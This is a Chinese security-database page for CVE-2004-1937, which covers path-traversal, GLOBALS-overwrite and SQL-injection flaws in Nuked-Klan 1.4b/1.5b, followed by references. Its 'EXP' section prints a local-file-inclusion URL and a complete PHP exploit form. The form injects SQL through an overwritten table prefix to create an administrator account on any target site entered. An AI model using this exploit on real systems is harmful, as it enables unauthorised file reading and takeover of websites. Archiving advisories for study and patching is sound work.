Nuked-Klan多个漏洞-安全小百科

Nuked-Klan多个漏洞

漏洞ID	1107865	漏洞类型	路径遍历
发布时间	2004-04-12	更新时间	2005-10-20
CVE编号	CVE-2004-1937	CNNVD-ID	CNNVD-200412-347
漏洞平台	PHP	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/23988
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-347

|漏洞详情

Nuked-KlaN1.4b和1.5b版本存在多个目录遍历漏洞。远程攻击者可以借助(1)index.php的user_langue参数或(2)update.php的langue参数或修改任意GLOBAL变量导致conf.inc.php之前globals.php下载(3)file参数中带有全域变量page的..序列或(4)user_langue的../globals.phpintheparameter读取或包含任意文件。

|漏洞EXP

source: http://www.securityfocus.com/bid/10104/info

Nuked-Klan is prone to multiple vulnerabilities. These issues include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files and an SQL injection vulnerability.

- To include a local file:

http://www.example.com/index.php?user_langue=../../../../../file/to/view

- Create admin (overwriting GLOBALS) :

-------------------------------------------------------

<html>
<head>
<title>Nuked-KlaN b1.5 Create Admin</title>
</head>
<body>
<?
function ascii_sql($str) {
for ($i=0;$i < strlen($str);$i++) {
if ($i == strlen($str)-1){
$ascii_char.=ord(substr($str,$i));
}else{
$ascii_char.=ord(substr($str,$i)).',';
}
}
return $ascii_char;
}

if (isset($_POST["submit"])){

echo "<script>url='".$target."/index.php?
file=Suggest&op=add_sug&user_langue=../globals.php&nuked[prefix]=nuked_users%20
(id,pseudo,pass,niveau)%20VALUES%20(12345,char(".ascii_sql($_POST
["pseudo"])."),md5(char(".ascii_sql($_POST
["pass"]).")),9)/*&module=Gallery';window.open(url);</script>";
echo "<br><br><br><br>Admin should have been created.";

}else{
?>

<form method="POST" action="<? echo $PHP_SELF; ?>">
<b>Target :</b> <input type="text" name="target" value="http://"><br>
<b>Admin Nick :</b> <input type="text" name="pseudo"><br>
<b>Admin Pass :</b> <input type="text" name="pass"><br>
<input type="submit" name="submit" value="Create Admin">
</form>
<?
}
?>
</body>
</html>
-------------------------------------------------------

|参考资料

来源:BID
名称:10104
链接:http://www.securityfocus.com/bid/10104
来源:www.phpsecure.info
链接:http://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt
来源:XF
名称:nuked-klan-configurtion-corruption(15844)
链接:http://xforce.iss.net/xforce/xfdb/15844
来源:XF
名称:nuked-klan-file-include(15843)
链接:http://xforce.iss.net/xforce/xfdb/15843
来源:SECUNIA
名称:11341
链接:http://secunia.com/advisories/11341
来源:BUGTRAQ
名称:20040417[SCSA-028]Nuked-KlanMultipleVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108222826225823&w;=2

相关推荐: Cisco 7940/7960 VoIP 消息欺骗漏洞

Cisco 7940/7960 VoIP 消息欺骗漏洞漏洞ID 1198714 漏洞类型未知发布时间 2005-07-11 更新时间 2005-07-11 CVE编号 CVE-2005-2181 CNNVD-ID CNNVD-200507-093 漏洞平…

文章版权归作者所有，未经允许请勿转载。

THE END